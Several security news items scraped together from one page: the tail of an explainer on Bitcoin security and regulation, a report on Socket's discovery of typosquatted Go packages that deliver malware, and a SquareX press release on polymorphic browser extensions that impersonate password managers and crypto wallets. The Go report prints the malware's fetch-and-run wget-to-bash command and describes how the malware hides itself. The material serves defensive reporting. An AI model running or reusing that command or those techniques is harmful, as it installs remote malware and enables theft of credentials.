*   Immutability: Changes can never be made to the Bitcoin transactions that have already been confirmed on the blockchain and hence recorded to it.
*   Cryptographic Security: Wallet addresses and transaction data are protected from alteration by sophisticated encryption methods.
*   Peer-to-peer Verification: Multiple nodes in the network verify each transaction, making it nearly impossible to commit fraud.

These characteristics are what make Bitcoin one of the most protected digital assets; however, users still need to take the necessary additional steps to secure their assets.

**Bitcoin Regulation and Its Effect on Cybersecurity**

Universal adoption of Bitcoin entails the enforcement of governance and legislative bodies at a macro level to improve safety protocols within the crypto industry. The UK, Japan and the EU have implemented more stringent KYC and AML policies in an attempt to curb fraudulent and criminal behaviours. For instance, the MiCA Regulations passed by the EU in early 2023 aimed to manage the market of crypto assets by enforcing more comprehensive KYC policies together with monitoring of transactions.

Regulatory authority has the challenge of attempting to establish security measures without undermining the core principle of decentralization that Bitcoin embodies. Overcontrol creates a possibility of pushing transactions underground to uncontrolled P2P markets, which can escalate cyber threats. Cautious investors need to check what local regulations are and implement basic security measures.

For example, the U.S. has become stricter, requiring crypto exchanges to register with the SEC and follow strict AML (Anti-Money Laundering) procedures, while Singapore has opted for a modern approach under the Payment Services Act, which ensures innovation alongside consumer protection.

**The Future of Bitcoin Security**

In response to novel cybersecurity threats, safeguarding Bitcoin will become more sophisticated over time. The following innovations are working towards enhanced Bitcoin protection:

*   Multi-Party Computation (MPC): A form of cryptography that improves a user’s wallet security by splitting the control of the keys to the wallet among several parties.
*   Decentralized Identity Solutions: These include systems that block identity theft through blockchain-based identity verification and phishing safeguard systems.
*   Quantum Resistant Cryptography: Working on developing methods of encryption that resist future attacks on Bitcoin’s secrecy through quantum computing. Institutions like the National Institute of Standards and Technology (NIST) and the community of Bitcoin Core developers are working to provide solutions. These solutions are aimed at countering quantum computing to secure blockchain technologies for ever so long.
*   AI-Powered Fraud Detection: Algorithms created to analyze for potential illicit action in Bitcoin operations and strengthen the antifraud measures in place on the Bitcoin networks. Chainalysis and CipherTrace have implemented tools that use AI to analyze blockchain transactions for any suspicious activity so that exchanges and financial institutions can manage their exposure.

**Conclusion**

The freedom offered by a decentralized bitcoin comes with a tradeoff since it often makes users vulnerable to cybersecurity issues. As time goes by, traders and investors alike need to focus on precautionary measures as their digital wealth is increasingly at risk. With the development of hardware wallets and AI fraud detection systems, bitcoin can remain a strong component of one’s portfolio in the era of digitization. Being proactive by adopting optimal security methods allows Bitcoin users to deal with potential threats head-on.

Bitcoin and Cybersecurity: Protecting Digital Assets in a Decentralized World

Socket exposes a typosquatting campaign delivering malware to Linux and macOS systems via malicious Go packages. Discover the…

Socket exposes a typosquatting campaign delivering malware to Linux and macOS systems via malicious Go packages. Discover the tactics used, including obfuscation and domain typosquatting, and learn how to stay safe.

Cybersecurity researchers at software supply chain security solutions provider, Socket, have uncovered a concerning new trend where malicious actors are increasingly targeting developers within the Go programming language network.

By employing a technique known as typosquatting, these attackers distribute malware disguised as legitimate Go packages, which are designed to install hidden malware loaders on Linux and macOS systems.

Socket’s investigation, shared with Hackread.com, shows that the attackers have published at least seven of these deceptive packages on the Go Module Mirror, a central repository for Go modules. The full list includes:

*   github.com/vainreboot/layout
*   github.com/utilizedsun/layout
*   github.com/thankfulmai/hypert
*   github.com/shallowmulti/hypert
*   github.com/ornatedoctrin/layout
*   github.com/shadowybulk/hypert
*   github.com/belatedplanet/hypert

These packages impersonate popular libraries, including “hypert” for testing HTTP API clients and “layout” for UI development.

Contextual Details of the Layout Package (Source: Socket)

The “hypert” package appears to be specifically aimed at developers in the financial sector.

Contextual Details of the Malicious Hypert Package (Source: Socket)

This malicious package contains concealed functions (such as qcJjJne()) that enable remote code execution. Upon being imported into a project, the malicious code silently downloads and executes a script from a remote server (alturastreeticu), which, in turn, installs an executable file that can potentially steal sensitive data or credentials.

To evade detection, the attackers employ various techniques. Such as, they utilize array-based string obfuscation to conceal the malicious commands within the code, making it difficult for traditional security tools to identify the threat. For instance, the command

wget -O - https://alturastreeticu/storage/de373d0df/a31546bf | /bin/bash & is split into single-character strings and reconstructed using non-sequential indexing.

 Additionally, the malicious script incorporates a time delay, waiting for an hour before fetching the final payload, which helps them circumvent security measures that focus on immediate actions.

The malicious domains used in this campaign often resemble legitimate websites, particularly those related to financial institutions. This tactic, known as domain typosquatting, aims to deceive users by exploiting their trust in familiar names and brands.

The attackers are also reusing similar payloads and filenames across different domains and IP addresses, suggesting a coordinated and persistent effort.

The f0eee999 ELF file, for example, shows initial minimal malicious behaviour, such as reading /sys/kernel/mm/transparent\_hugepage/, aligning with a cryptominer or loader that remains dormant until conditions are met. This file, along with the a31546bf script, has been observed in Mads Hougesen’s research, “Rogue One: A Malware Story,” indicating potential connections and broader trends, researchers noted.

Socket’s research highlights the growing risks associated with software supply chain attacks, where malicious actors target developers and compromise the integrity of widely used libraries and packages.

Developers are advised to be vigilant when incorporating external packages into their projects. Real-time scanning tools and browser extensions, along with code audits, and careful dependency management practices, are crucial. Developers should also verify package integrity, monitor new repositories, and share indicators of compromise within the community.

Thomas Richards, Principal Consultant, Network and Red Team Practice Director at Black Duck, a Burlington, Massachusetts-based provider of application security solutions, commented on the latest development stating,

_“_This typosquatting attack is not a new attack vector, however, it still underscores how important it is to manage software risk and verify modules are legitimate before they are integrated into source code.  Verifying packages is usually done by signing them before they are added to a central repository. Any application being developed in Go should be reviewed immediately to be sure the malicious packages are not present, and systems have not been compromised._“_

Malware Infects Linux and macOS via Typosquatted Go Packages

Palo Alto, Singapore, 6th March 2025, CyberNewsWire

**Palo Alto, Singapore, March 6th, 2025, CyberNewsWire**

With recent attack disclosures like Browser Syncjacking and extension infostealers, browser extensions have become a primary security concern at many organizations. SquareX’s research team discovers a new class of malicious extensions that can impersonate any extension installed on the victim’s browser, including password managers and crypto wallets. These malicious extensions can morph themselves to have the exact same user interface, icons and text as the legitimate extension, making it an extremely convincing case for victims to enter their credentials and other sensitive information. This attack impacts most major browsers, including Chrome and Edge.

Polymorphic extensions work by exploiting the fact that most users interact with extensions via the pinned in the browser toolbar. The attack begins with the user installing the malicious extension, which disguises itself, for example, as an unassuming AI tool. To make the attack even more convincing, the extension performs the AI functionality as advertised and remains benign for a predetermined period of time. 

However, while all this is happening, the malicious extension starts figuring out what other extensions are installed in the victim’s browser. Once identified, the polymorphic extension completely changes its own appearance to look like the target, including the icon shown on the pinned toolbar. It can even disable the target extension temporarily, removing it from the pinned bar. Given that most users use these icons as a visual confirmation to inform which extension they are interacting with, changing the icon itself is likely sufficient to convince the average user that they are clicking on the legitimate extension. Even if the victim navigates to the extension dashboard, there is no obvious way to correlate the tools displayed there to the pinned icons. To avoid suspicion, the malicious extension can even temporarily disable the target extension such that they are the only ones with the target’s icon on the pinned tab. 

Critically, the polymorphic extension can impersonate any browser extension. For example, it can mimic popular password managers to trick victims into entering their master password. This password can then be used by the attacker to log on to the real password manager and access all credentials stored in the password vault. Similarly, the polymorphic extension can also mimic popular crypto wallets, allowing them to use the stolen credentials to authorize transactions to send cryptocurrency to the attacker. Other potential targets include developer tools and banking extensions that may provide the attacker unauthorized access to apps where sensitive data or financial assets are stored.

Furthermore, the attack only requires medium-risk permissions based on Chrome Store’s classification. Ironically, many of these permissions are used by password managers themselves, as well as other popular tools like ad blockers and page stylers, making it especially difficult for Chrome Store and security teams to identify malicious intent just by looking at the extension’s code.

> The founder of SquareX, Vivek Ramachandran cautions that “Browser extensions present a major risk to enterprises and users today. Unfortunately, most organizations have no way of auditing their current extension footprint and to check whether they are malicious. This further underscores the need for a browser native security solution like Browser Detection and Response, similar to what an EDR is to the operating system.”

These polymorphic extensions exploit existing features within Chrome to conduct the attack. As such, there is no software bug involved, and it cannot be patched. SquareX has written to Chrome for responsible disclosure, recommending banning or implementation of user alerts for any extension icon changes or abrupt changes in HTML, as these techniques can easily be leveraged by attackers to impersonate other extensions in a polymorphic attack. For enterprises, static extension analysis and permissions-based policies are no longer sufficient – it is critical to have a browser-native security tool that can dynamically analyze extension behaviour at runtime, including polymorphic tendencies of malicious extensions. 

For more information about polymorphic extensions, additional findings from this research are available at https://sqrx.com/polymorphic-extensions.

**About SquareX**

SquareX helps organizations detect, mitigate, and threat-hunt client-side web attacks happening against their users in real time, including defending against malicious extensions. In addition to the polymorphic attack, SquareX was also the first to discover and disclose multiple extension-based attacks, including Browser Syncjacking, the Chrome Store consent phishing attack leading to Cyberhaven’s breach and numerous other MV3-compliant malicious extensions revealed at DEF CON 32.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

Additionally, with SquareX, enterprises can provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions. 

**Contact**

**Head of PR**  
**Junice Liew**  
**SquareX**  
**\[email protected\]**

Tag

#mac